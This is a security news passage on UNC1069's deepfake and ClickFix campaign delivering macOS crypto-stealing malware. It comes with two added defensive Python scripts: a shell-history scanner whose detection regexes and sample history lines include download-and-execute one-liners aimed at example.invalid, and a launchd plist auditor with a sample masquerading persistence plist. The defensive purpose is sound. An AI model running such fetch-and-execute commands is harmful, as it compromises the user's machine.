North Korean hackers are deploying advanced social engineering tactics combined with never-before-seen macOS malware strains to siphon cryptocurrency assets. The operation leverages deepfake videos and the ClickFix method, tricking victims into executing malicious commands through fake technical support scenarios. Google's Mandiant incident responders identified seven distinct malware families during an investigation of a fintech breach attributed to the UNC1069 group.
The attack began on Telegram, where the threat actor impersonated a crypto executive from a compromised account. After establishing trust, the victim was directed to a counterfeit Zoom page that played an AI-generated video of another industry leader. The perpetrator feigned audio problems and pointed the victim to a webpage offering a purported fix: a command the victim was to run themselves, supplied in Windows and macOS variants. This technique mirrors previous campaigns linked to the BlueNoroff hacking collective.
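ClickFix leaves a forensic trace the rest of the chain does not: the pasted command usually survives in the victim's shell history. The script below is an added example, not from the article or from Mandiant, that triages ~/.zsh_history (zsh extended format) or ~/.bash_history for pipe-to-shell and decode-and-execute one-liners. The sample history lines and the example.invalid URLs are constructed, and the rules are generic ClickFix heuristics, not UNC1069's actual commands, which the article does not reproduce.

```python
"""Triage a macOS shell history for ClickFix-style one-liners.

ClickFix lures talk the victim into pasting a "fix" into Terminal, so the
command usually survives in ~/.zsh_history (zsh extended format,
": <epoch>:<duration>;<command>") or ~/.bash_history (bare commands,
optionally preceded by "#<epoch>" stamp lines when HISTTIMEFORMAT is set).
Added example: the rules are generic pipe-to-shell heuristics, not the
commands used in the UNC1069 intrusion, which the article does not show.
"""
import os
import re
import sys
from typing import Dict, Iterator, List, Optional, Tuple

# (rule name, pattern). Broad on purpose; allowlist known installers per fleet.
RULES = [
    ("pipe_to_shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("base64_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    ("eval_of_download",
     re.compile(r"\beval\b.*\$\((curl|wget)\b")),
    ("interpreter_inline_fetch",
     re.compile(r"\b(python3?|perl|ruby)\s+-[ce]\b.*(urlopen|https?://)")),
    ("download_then_exec",
     re.compile(r"\b(curl|wget)\b.*(chmod\s+\+x|xattr\s+-[a-z]*d)")),
    ("osascript_shell",
     re.compile(r"\bosascript\b.*do shell script")),
]

ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")   # zsh extended history entry
BASH_TS = re.compile(r"^#(\d{9,})$")          # bash HISTTIMEFORMAT stamp line


def iter_commands(history_text: str) -> Iterator[Tuple[Optional[int], str]]:
    """Yield (epoch or None, command). zsh writes multi-line commands with a
    trailing backslash on each continued line; those are folded back together."""
    buf, pending = "", None
    for raw in history_text.splitlines():
        buf += raw
        if buf.endswith("\\"):
            buf = buf[:-1] + " "
            continue
        line, buf = buf, ""
        ts = BASH_TS.match(line)
        if ts:
            pending = int(ts.group(1))      # applies to the next bash command
            continue
        m = ZSH_EXT.match(line)
        if m:
            yield int(m.group(1)), m.group(2).strip()
        elif line.strip():
            yield pending, line.strip()
        pending = None
    if buf.strip():                         # dangling continuation at EOF
        yield pending, buf.strip()


def scan_history(history_text: str) -> List[Dict[str, object]]:
    """Return one finding per (command, rule) pair, in file order."""
    findings: List[Dict[str, object]] = []
    for epoch, cmd in iter_commands(history_text):
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append({"rule": name, "epoch": epoch, "command": cmd})
    return findings


# Constructed sample histories; example.invalid is a reserved, non-resolving domain.
SAMPLE_ZSH_HISTORY = """\
: 1712345600:0;ls -la ~/Projects
: 1712345660:0;brew install jq
: 1712345720:0;curl -fsSL https://example.invalid/zoom-audio-fix.sh | bash
: 1712345780:0;echo 'Y3VybCAuLi4=' | base64 -D | sh
: 1712345840:0;git clone https://github.com/example/repo
: 1712345900:0;python3 -c "import urllib.request;exec(urllib.request.urlopen('https://example.invalid/p').read())"
: 1712345960:0;osascript -e 'do shell script "curl -s https://example.invalid/a | sh"'
: 1712346020:0;eval "$(curl -s https://example.invalid/e)"
"""

SAMPLE_BASH_HISTORY = """\
#1712346100
cd /tmp
#1712346160
curl -o fix https://example.invalid/fix && chmod +x fix && ./fix
"""


def main(paths: List[str]) -> int:
    """Scan the given history files (default: the current user's) and print hits."""
    hits = 0
    for p in paths or [os.path.expanduser("~/" + n) for n in (".zsh_history", ".bash_history")]:
        if not os.path.exists(p):
            continue
        # zsh metafies some bytes; replace rather than crash on them.
        with open(p, encoding="utf-8", errors="replace") as fh:
            for f in scan_history(fh.read()):
                hits += 1
                print(f"{p}: [{f['rule']}] {f['command']}")
    return hits


if __name__ == "__main__":
    sys.exit(1 if main(sys.argv[1:]) else 0)
```

Run it against a collected history file rather than the live one where possible, and treat the epoch as the pivot for the rest of the timeline: the timestamp of the pasted command brackets when the macOS payload chain started.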
Once the macOS command ran, the infection staged a chain of tools. WAVESHAPER is a persistent C++ backdoor that communicates over HTTP; HYPERCALL loads encrypted configurations and reflectively injects HIDDENCALL, which provides interactive access. Additional payloads include SILENCELIFT, a minimal beacon, and DEEPBREATH, a Swift-based stealer that bypasses macOS privacy (TCC) controls to plunder keychains, browser data, and notes.
SUGARLOADER and its component CHROMEPUSH establish persistence through launch daemons and masquerade as browser extensions to capture credentials and keystrokes. Most of these strains remain undetected by common antivirus engines, so hunting for them has to lean on behaviour (persistence entries, privacy-control access, unexpected outbound HTTP) rather than signatures. Mandiant notes that this concentration of unique tools against a single target is highly atypical and indicates a deliberate effort to harvest maximum intelligence, which fuels both immediate cryptocurrency theft and future impersonation-based operations.
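Because these strains evade common antivirus engines, one practical check is to audit launchd persistence on its own terms. The script below is an added example (not Mandiant's tooling, and not derived from SUGARLOADER's real plist, which the article does not show): it parses LaunchDaemons and LaunchAgents plists with plistlib and flags programs in staging directories, hidden path components, inline interpreter commands, and vendor-lookalike labels whose binary is not where that vendor installs. The sample plists and the vendor path table are constructed assumptions.

```python
"""Audit launchd plists for persistence that looks like malware staging.

Added example, not Mandiant's tooling; it is not derived from SUGARLOADER's
real plist, which the article does not reproduce. Heuristics only: every
hit is a lead for a human, not a verdict.
"""
import glob
import os
import plistlib
from typing import Dict, Iterable, List

# Directories where a launchd-started program almost never legitimately lives.
SUSPICIOUS_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                   "/Users/Shared/", "/Library/Caches/", "/private/var/folders/")
# argv[0] values that mean the plist itself carries the payload command line.
INTERPRETERS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript",
                "/usr/bin/python3", "/usr/bin/perl", "/usr/bin/env")
# Assumption: where binaries behind these label prefixes are installed.
# Extend per fleet; a label that borrows a vendor's namespace but points
# elsewhere is the masquerading pattern this check is after.
VENDOR_PATHS = {
    "com.apple.": ("/System/", "/usr/", "/Library/Apple/", "/Applications/"),
    "com.google.": ("/Library/Google/", "/Applications/Google "),
}


def program_args(plist: dict) -> List[str]:
    """Effective command line: Program (if set) is the executable, ProgramArguments is argv."""
    args = [a for a in plist.get("ProgramArguments", []) if isinstance(a, str)]
    if isinstance(plist.get("Program"), str):
        args = [plist["Program"]] + args
    return args


def audit_plist(plist: dict) -> List[str]:
    """Return sorted reason tags for one parsed plist (empty means nothing flagged)."""
    args = program_args(plist)
    if not args:
        return ["no_program"]
    reasons = set()
    label = str(plist.get("Label", ""))
    if args[0] in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        reasons.add("interpreter_inline_command")
    for a in args:
        if a.startswith(SUSPICIOUS_DIRS):
            reasons.add("suspicious_directory")
        if any(part.startswith(".") for part in a.split("/") if part):
            reasons.add("hidden_path_component")
    for prefix, allowed in VENDOR_PATHS.items():
        if label.startswith(prefix) and not any(
                a.startswith(allowed) for a in args if a.startswith("/")):
            reasons.add("vendor_label_mismatch")
    return sorted(reasons)


def audit_bytes(data: bytes) -> List[str]:
    """Audit a plist given as raw XML or binary bytes (what you read off disk)."""
    return audit_plist(plistlib.loads(data))


def audit_files(paths: Iterable[str]) -> Dict[str, List[str]]:
    """Parse each plist from disk; unparseable files are reported too, since
    a corrupted or deliberately odd plist is itself a lead."""
    results: Dict[str, List[str]] = {}
    for p in paths:
        try:
            with open(p, "rb") as fh:
                reasons = audit_bytes(fh.read())
        except Exception as exc:  # I/O error or any parse failure
            reasons = [f"unparseable:{type(exc).__name__}"]
        if reasons:
            results[p] = reasons
    return results


# Constructed sample in on-disk XML form: a vendor-lookalike label whose
# "program" is really /bin/sh running a hidden script under /Users/Shared.
SAMPLE_LOOKALIKE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>/Users/Shared/.cache/helper</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>
"""
# Constructed samples already in parsed (dict) form.
SAMPLE_BENIGN = {"Label": "com.example.updater",
                 "ProgramArguments": ["/Library/Application Support/Example/updater", "--daemon"],
                 "RunAtLoad": True}
SAMPLE_TMP_AGENT = {"Label": "com.apple.softwareupdate.agent",
                    "ProgramArguments": ["/private/tmp/.su/agent"],
                    "RunAtLoad": True, "KeepAlive": True}


def main() -> None:
    patterns = ["/Library/LaunchDaemons/*.plist", "/Library/LaunchAgents/*.plist",
                os.path.expanduser("~/Library/LaunchAgents/*.plist")]
    files = [p for pat in patterns for p in sorted(glob.glob(pat))]
    for path, reasons in audit_files(files).items():
        print(f"{path}: {', '.join(reasons)}")


if __name__ == "__main__":
    main()
```

Pair the plist findings with code-signing checks on the flagged binaries (codesign -dv) and with the file's creation time; the vendor table is deliberately small, so expect to tune it before running it fleet-wide.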
UNC1069 has consistently refined its victim selection, pivoting from Web3 entities in 2023 to broader financial infrastructure targets in the past year.
